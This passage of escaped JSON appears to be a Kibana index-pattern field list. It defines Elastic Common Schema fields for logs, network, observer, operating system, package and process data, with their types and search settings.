count\":0,\"name\":\"interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"network.application\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.community_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.direction\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.forwarded_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.iana_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.transport\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.full\"}}},{\"count\":0,\"name\":\"observer.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.name\"}}},{\"count\":0,\"name\":\"observer.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.serial_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"organization.name\"}}},{\"count\":0,\"name\":\"os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.full\"}}},{\"count\":0,\"name\":\"os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.name\"}}},{\"count\":0,\"name\":\"os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.build_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.checksum\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.install_scope\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.installed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.command_line\"}}},{\"count\":0,\"name\":\"process.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.executable\"}}},{\"count\":0,\"name\":\"process.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.parent.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.command_line\"}}},{\"count\":0,\"name\":\"process.parent.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.executable\"}}},{\"count\":0,\"name\":\"process.parent.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.name\"}}},{\"count\":0,\"name\":\"process.parent.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.title\"}}},{\"count\":0,\"name\":\"process.parent.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.working_directory\"}}},{\"count\":0,\"name\":\"process.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.title\"}}},{\"count\":0,\"name\":\"process.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory\",\"type\":\"string\",\"esT